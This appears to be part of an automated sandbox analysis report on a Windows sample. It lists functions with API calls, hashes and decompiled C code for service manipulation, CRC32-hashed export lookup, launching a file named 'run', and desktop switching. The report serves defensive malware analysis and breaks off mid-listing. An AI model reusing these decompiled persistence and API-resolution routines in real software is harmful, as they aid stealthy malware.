                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33373D
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F33374F
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 6F333764
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 6F33377C
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 6F33378E
                                                                                                                        • DeleteService.ADVAPI32(00000000), ref: 6F3337AA
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F3337B5
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,6F334142,USBManager,00000001), ref: 6F3337C0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Open$CloseHandleManagerQueryStatus$ControlDeleteSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3264530519-0
                                                                                                                        • Opcode ID: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction ID: 5263d4b2a8fcea566895c1d9edce346c899a6bba8f128117c562c56ae9b7ae69
                                                                                                                        • Opcode Fuzzy Hash: d1ddb42e66a8eb90f4376716a6b95f4a27417c971984c5e5bba463e16b09566a
                                                                                                                        • Instruction Fuzzy Hash: F32105B3904799ABD710DF648CC9A7F77FDEB8AB11F00051DF94086100DBB1E8498762
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BF7E6, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 190networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF7ED
                                                                                                                        • InternetQueryOptionW.WININET(00000000,0000004B,?,?), ref: 004BF826
                                                                                                                        • GetLastError.KERNEL32(00000000), ref: 004BF831
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004BEF63: __EH_prolog3.LIBCMT ref: 004BEF6A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalErrorInitializeInternetLastOptionQuerySection
                                                                                                                        • String ID: , m_Proxy.Proxy_Exceptions == $InternetQueryOption failed! (%d)$http=$m_Proxy.IPIE ==
                                                                                                                        • API String ID: 1508298941-2056814762
                                                                                                                        • Opcode ID: f34b1b4911db29999f32bb6f2c589cc90698ff2e8e37ffb72dbf7c0a9d0188e0
                                                                                                                        • Instruction ID: 9ad1b6df3386e347a72d3cb7093f428499c490254f7866096eee2b8184655fb1
                                                                                                                        • Opcode Fuzzy Hash: f34b1b4911db29999f32bb6f2c589cc90698ff2e8e37ffb72dbf7c0a9d0188e0
                                                                                                                        • Instruction Fuzzy Hash: E571AFB0A00218ABDF14EBA5CD92AEDB779BB25304F50416EE11AB31D1DB785F05CB68
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004B878E, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B8798
                                                                                                                          • Part of subcall function 004B91EF: _memset.LIBCMT ref: 004B9216
                                                                                                                        • OpenDesktopW.USER32(?,00000000,00000001,10000000), ref: 004B87DF
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 004B87EC
                                                                                                                        • GetLastError.KERNEL32 ref: 004B87F6
                                                                                                                        • CloseDesktop.USER32(00000000), ref: 004B8845
                                                                                                                        • GetLastError.KERNEL32 ref: 004B884D
                                                                                                                          • Part of subcall function 00404186: __EH_prolog3.LIBCMT ref: 0040418D
                                                                                                                          • Part of subcall function 004B58B0: __EH_prolog3_GS.LIBCMT ref: 004B58B7
                                                                                                                          • Part of subcall function 00401504: __EH_prolog3.LIBCMT ref: 0040150B
                                                                                                                        Strings
                                                                                                                        • ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624), xrefs: 004B8853
                                                                                                                        • ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612), xrefs: 004B87FC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: DesktopH_prolog3$ErrorLast$CloseH_prolog3_OpenThread_memset
                                                                                                                        • String ID: ChangeThreadDesktop(): OpenDesktop failed for Desktop %1%: %2% (.\TVObject.cpp, 624)$ChangeThreadDesktop(): SetThreadDesktop failed for %1%: %2% (.\TVObject.cpp, 612)
                                                                                                                        • API String ID: 1705971431-2669621406
                                                                                                                        • Opcode ID: b0dab21630589a1f9e7a99ac4996d413d656b13754b0becca8355b2b31170537
                                                                                                                        • Instruction ID: 341cb4497560b5c40c3de215531c3c48982386b9da47b8e32fb245829e8f1ba8
                                                                                                                        • Opcode Fuzzy Hash: b0dab21630589a1f9e7a99ac4996d413d656b13754b0becca8355b2b31170537
                                                                                                                        • Instruction Fuzzy Hash: 04317071C01288EADF11EBB4CC5AAEEBB38AF10344F54849EF54567282DB788B45C776
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F338230, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52memorystringCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 72%
                                                                                                                        			E6F338230(WCHAR* _a4, WCHAR* _a8) {
				long _t4;
				WCHAR* _t11;
				WCHAR* _t12;
				void* _t13;

				_t12 = _a4;
				_t11 = _a8;
				if(_t12 == 0 || _t11 == 0) {
					L7:
					_push(_t11);
					_push(_t12);
					M6F3405F8();
					return _t4;
				} else {
					_t4 = GetFileAttributesW(_t12);
					if((_t4 & 0xffffffef) == 0) {
						goto L7;
					} else {
						_t4 = lstrcmpiW(PathFindFileNameW(_t11), L"run");
						if(_t4 != 0) {
							goto L7;
						} else {
							SetLastError(_t4);
							_t13 = E6F33A2F0(_t12, 0, 0);
							if(_t13 != 0) {
								_push(0);
								_push(0);
								_push(1);
								E6F334230("open", _t13, 0);
								HeapFree(GetProcessHeap(), 0, _t13);
							}
							return 0;
						}
					}
				}
			}







                                                                                                                        0x6f338231
                                                                                                                        0x6f338236
                                                                                                                        0x6f33823c
                                                                                                                        0x6f3382ae
                                                                                                                        0x6f3382ae
                                                                                                                        0x6f3382af
                                                                                                                        0x6f3382b0
                                                                                                                        0x6f3382b8
                                                                                                                        0x6f338242
                                                                                                                        0x6f338243
                                                                                                                        0x6f33824e
                                                                                                                        0x00000000
                                                                                                                        0x6f338250
                                                                                                                        0x6f33825d
                                                                                                                        0x6f338265
                                                                                                                        0x00000000
                                                                                                                        0x6f338267
                                                                                                                        0x6f338268
                                                                                                                        0x6f338278
                                                                                                                        0x6f33827f
                                                                                                                        0x6f338281
                                                                                                                        0x6f338283
                                                                                                                        0x6f338285
                                                                                                                        0x6f33828f
                                                                                                                        0x6f3382a1
                                                                                                                        0x6f3382a1
                                                                                                                        0x6f3382ab
                                                                                                                        0x6f3382ab
                                                                                                                        0x6f338265
                                                                                                                        0x6f33824e

                                                                                                                        APIs
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 6F338243
                                                                                                                        • PathFindFileNameW.SHLWAPI(?,run), ref: 6F338256
                                                                                                                        • lstrcmpiW.KERNEL32(00000000), ref: 6F33825D
                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 6F338268
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
                                                                                                                          • Part of subcall function 6F33A2F0: GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                          • Part of subcall function 6F33A2F0: HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                          • Part of subcall function 6F33A2F0: WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                          • Part of subcall function 6F334230: RtlZeroMemory.NTDLL(0000003C,0000003C), ref: 6F33423A
                                                                                                                          • Part of subcall function 6F334230: ShellExecuteExA.SHELL32(0000003C,00000000,00000000), ref: 6F3342A7
                                                                                                                          • Part of subcall function 6F334230: WaitForSingleObject.KERNEL32(?,?), ref: 6F3342CD
                                                                                                                          • Part of subcall function 6F334230: GetExitCodeProcess.KERNEL32 ref: 6F3342E1
                                                                                                                          • Part of subcall function 6F334230: CloseHandle.KERNEL32(?), ref: 6F3342EC
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33829A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3382A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$ByteCharFileMultiWide$AllocAttributesCloseCodeErrorExecuteExitFindFreeHandleLastMemoryNameObjectPathShellSingleWaitZerolstrcmpi
                                                                                                                        • String ID: open$run
                                                                                                                        • API String ID: 2941314601-2128457515
                                                                                                                        • Opcode ID: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction ID: eafe0a8456b46b7470652278ffb60c0f41678d4b5b7510c2a5e2062331bb59c3
                                                                                                                        • Opcode Fuzzy Hash: 13b53d38b7ded8af4f79d3298f1d70a1a5f0f1b7e858ceb7254ef7d978c0a1ef
                                                                                                                        • Instruction Fuzzy Hash: EB01DB37E49FB47BDA30E6749D09FCB362DAF92B31F010009FD55E6080DB69D41246A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00404826, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0040482D
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00404837
                                                                                                                        • int.LIBCPMT ref: 0040484E
                                                                                                                          • Part of subcall function 0040CBDA: std::_Lockit::_Lockit.LIBCPMT ref: 0040CBEB
                                                                                                                        • std::locale::_Getfacet.LIBCPMT ref: 00404857
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040488F
                                                                                                                        • std::locale::facet::_Incref.LIBCPMT ref: 0040489F
                                                                                                                        • std::locale::facet::facet_Register.LIBCPMT ref: 004048A5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8GetfacetH_prolog3IncrefRegisterThrowstd::locale::_std::locale::facet::_std::locale::facet::facet_
                                                                                                                        • String ID: bad cast
                                                                                                                        • API String ID: 447036056-3145022300
                                                                                                                        • Opcode ID: 857079eb983983da00f42925b1e8a8b8f26dd6c4d5bdc9ccccb852d03e7f82a3
                                                                                                                        • Instruction ID: 471960133c701604e416d2b83f0f93bbbd75309162c0f2f2f7cb49415d960507
                                                                                                                        • Opcode Fuzzy Hash: 857079eb983983da00f42925b1e8a8b8f26dd6c4d5bdc9ccccb852d03e7f82a3
                                                                                                                        • Instruction Fuzzy Hash: 4501C47290021A97DF05FBA0C856AAE7B75BFC4710F144A2AE610BB2D1DF7CDD028795
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F331DB0, Relevance: 13.6, APIs: 9, Instructions: 147stringlibraryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F331DB0() {
				short _t58;
				signed int _t60;
				signed int _t61;
				signed int _t63;
				signed int _t72;
				signed int _t73;
				intOrPtr _t77;
				signed int _t78;
				CHAR* _t80;
				signed int _t83;
				signed int _t89;
				intOrPtr* _t90;
				char* _t96;
				intOrPtr* _t101;
				char* _t103;
				CHAR* _t106;
				char* _t108;
				CHAR* _t109;
				short _t112;
				struct HINSTANCE__* _t115;
				void* _t116;

				_t101 =  *((intOrPtr*)(_t116 + 0x3c));
				_t58 = 1;
				 *(_t116 + 0x14) = 1;
				if(_t101 == 0 ||  *_t101 != 0x5a4d) {
					L28:
					return _t58;
				} else {
					_t83 =  *((intOrPtr*)(_t101 + 0x3c)) + _t101;
					 *(_t116 + 0x24) = _t83;
					if( *_t83 != 0x4550) {
						goto L28;
					}
					_t77 =  *((intOrPtr*)(_t83 + 0x78));
					_t78 = _t77 + _t101;
					 *(_t116 + 0x24) =  *((intOrPtr*)(_t77 + _t101 + 0x1c)) + _t101;
					 *(_t116 + 0x20) =  *((intOrPtr*)(_t78 + 0x24)) + _t101;
					_t89 =  *((intOrPtr*)(_t78 + 0x20)) + _t101;
					 *(_t116 + 0x14) = _t78;
					 *(_t116 + 0x1c) = _t89;
					 *(_t116 + 0xc) = 0;
					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
						L27:
						return _t58;
					}
					while(1) {
						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
						_t96 =  *(_t116 + 0x50);
						_t61 = _t60 ^  *(_t116 + 0x54);
						_t112 = 0;
						if(_t96 <= 0) {
							goto L25;
						}
						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
						while(_t61 !=  *_t90) {
							_t112 = _t112 + 1;
							_t90 = _t90 + 0x10;
							if(_t112 < _t96) {
								continue;
							}
							goto L25;
						}
						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
							L22:
							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
							_t101 =  *((intOrPtr*)(_t116 + 0x48));
							if(_t103 == 0) {
								 *(_t116 + 0x20) = 0;
							}
						} else {
							_t80 = StrDupA(_t103);
							if(_t80 == 0) {
								L24:
								_t78 =  *(_t116 + 0x1c);
								_t101 =  *((intOrPtr*)(_t116 + 0x48));
								goto L25;
							}
							 *(_t116 + 0x20) = 0;
							_t108 = StrChrA(_t80, 0x2e);
							if(_t108 == 0) {
								L20:
								LocalFree(_t80);
								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
									goto L24;
								}
								_t78 =  *(_t116 + 0x1c);
								goto L22;
							}
							 *_t108 = 0;
							_t109 = _t108 + 1;
							_t115 = GetModuleHandleA(_t80);
							if(_t115 != 0) {
								L18:
								 *(_t116 + 0x1c) = 1;
								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
								_t73 =  *(_t116 + 0x54);
								_push(_t73);
								_push(0x10);
								_push(_t116 + 0x3c);
								_push(_t115);
								 *(_t116 + 0x44) = _t72 ^ _t73;
								 *((intOrPtr*)(_t116 + 0x48)) = 0;
								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
								 *(_t116 + 0x50) = 0;
								E6F331DB0();
								_t103 =  *(_t116 + 0x50);
								_t116 = _t116 + 0x10;
								L19:
								_t112 =  *((intOrPtr*)(_t116 + 0x10));
								goto L20;
							}
							_t115 = LoadLibraryA(_t80);
							if(_t115 == 0) {
								goto L19;
							}
							goto L18;
						}
						L25:
						_t63 =  *(_t116 + 0x14) + 1;
						 *(_t116 + 0x14) = _t63;
						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
							_t89 =  *(_t116 + 0x24);
							continue;
						}
						_t58 =  *(_t116 + 0x20);
						goto L27;
					}
				}
			}
























                                                                                                                        0x6f331db4
                                                                                                                        0x6f331db8
                                                                                                                        0x6f331dbd
                                                                                                                        0x6f331dc3
                                                                                                                        0x6f331f91
                                                                                                                        0x6f331f91
                                                                                                                        0x6f331dd7
                                                                                                                        0x6f331dda
                                                                                                                        0x6f331de2
                                                                                                                        0x6f331de6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331ded
                                                                                                                        0x6f331df4
                                                                                                                        0x6f331df8
                                                                                                                        0x6f331e01
                                                                                                                        0x6f331e08
                                                                                                                        0x6f331e0e
                                                                                                                        0x6f331e12
                                                                                                                        0x6f331e16
                                                                                                                        0x6f331e1e
                                                                                                                        0x6f331f8c
                                                                                                                        0x00000000
                                                                                                                        0x6f331f8c
                                                                                                                        0x6f331e34
                                                                                                                        0x6f331e3b
                                                                                                                        0x6f331e48
                                                                                                                        0x6f331e4d
                                                                                                                        0x6f331e51
                                                                                                                        0x6f331e55
                                                                                                                        0x6f331e59
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331e5f
                                                                                                                        0x6f331e63
                                                                                                                        0x6f331e67
                                                                                                                        0x6f331e68
                                                                                                                        0x6f331e6d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331e6f
                                                                                                                        0x6f331e87
                                                                                                                        0x6f331e8b
                                                                                                                        0x6f331e8f
                                                                                                                        0x6f331f50
                                                                                                                        0x6f331f56
                                                                                                                        0x6f331f5c
                                                                                                                        0x6f331f60
                                                                                                                        0x6f331f62
                                                                                                                        0x6f331f62
                                                                                                                        0x6f331eae
                                                                                                                        0x6f331eb5
                                                                                                                        0x6f331eb9
                                                                                                                        0x6f331f6c
                                                                                                                        0x6f331f6c
                                                                                                                        0x6f331f70
                                                                                                                        0x00000000
                                                                                                                        0x6f331f70
                                                                                                                        0x6f331ec2
                                                                                                                        0x6f331ed0
                                                                                                                        0x6f331ed4
                                                                                                                        0x6f331f3e
                                                                                                                        0x6f331f3f
                                                                                                                        0x6f331f4a
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331f4c
                                                                                                                        0x00000000
                                                                                                                        0x6f331f4c
                                                                                                                        0x6f331ed6
                                                                                                                        0x6f331eda
                                                                                                                        0x6f331ee1
                                                                                                                        0x6f331ee5
                                                                                                                        0x6f331ef4
                                                                                                                        0x6f331ef5
                                                                                                                        0x6f331f08
                                                                                                                        0x6f331f0f
                                                                                                                        0x6f331f13
                                                                                                                        0x6f331f14
                                                                                                                        0x6f331f1a
                                                                                                                        0x6f331f1d
                                                                                                                        0x6f331f1e
                                                                                                                        0x6f331f22
                                                                                                                        0x6f331f26
                                                                                                                        0x6f331f2a
                                                                                                                        0x6f331f2e
                                                                                                                        0x6f331f33
                                                                                                                        0x6f331f37
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331f3a
                                                                                                                        0x00000000
                                                                                                                        0x6f331f3a
                                                                                                                        0x6f331eee
                                                                                                                        0x6f331ef2
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f331ef2
                                                                                                                        0x6f331f74
                                                                                                                        0x6f331f78
                                                                                                                        0x6f331f79
                                                                                                                        0x6f331f80
                                                                                                                        0x6f331e30
                                                                                                                        0x00000000
                                                                                                                        0x6f331e30
                                                                                                                        0x6f331f86
                                                                                                                        0x00000000
                                                                                                                        0x6f331f8b
                                                                                                                        0x6f331e34

                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        • StrDupA.SHLWAPI(?,00000000,00000000,00000000), ref: 6F331EAF
                                                                                                                        • StrChrA.SHLWAPI(?,?,00000000,0000002E), ref: 6F331ECA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331EDB
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331EE8
                                                                                                                        • lstrlenA.KERNEL32(00000001,?,?,00000000,0000002E), ref: 6F331EFD
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6F331F08
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331F3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1770823755-0
                                                                                                                        • Opcode ID: e1719bb1d2010f95499b823d1ed3a48d1804b073bf590fab8e68cad7c2022153
                                                                                                                        • Instruction ID: 65e8725b82402b4f01efe4d29028d19829b0407ec8df8c8736d513323c304720
                                                                                                                        • Opcode Fuzzy Hash: e1719bb1d2010f95499b823d1ed3a48d1804b073bf590fab8e68cad7c2022153
                                                                                                                        • Instruction Fuzzy Hash: 4E5157729083958FC710EF58C880A5BB7FABF89708F044A1DF99597341D7B2E8158BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3337D0, Relevance: 13.6, APIs: 9, Instructions: 80memoryserviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3337D0(int _a4, char** _a8, int _a12) {
				intOrPtr _v24;
				struct _SERVICE_STATUS _v28;
				int _t14;
				long _t18;
				int _t26;
				void* _t31;
				void* _t33;

				_t31 = _a4;
				if(_t31 == 0) {
					return 0;
				} else {
					_a4 = 0;
					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
						_t18 = _a4;
						_t26 = _t18;
						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
						if(_t33 != 0) {
							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
							}
							HeapFree(GetProcessHeap(), 0, _t33);
						}
					}
					_t14 = QueryServiceStatus(_t31,  &_v28);
					if(_v24 != 4 || _t14 == 0) {
						StartServiceA(_t31, _a12, _a8);
					}
					return 1;
				}
			}










                                                                                                                        0x6f3337d4
                                                                                                                        0x6f3337da
                                                                                                                        0x6f333897
                                                                                                                        0x6f3337e0
                                                                                                                        0x6f3337f1
                                                                                                                        0x6f3337fd
                                                                                                                        0x6f3337ff
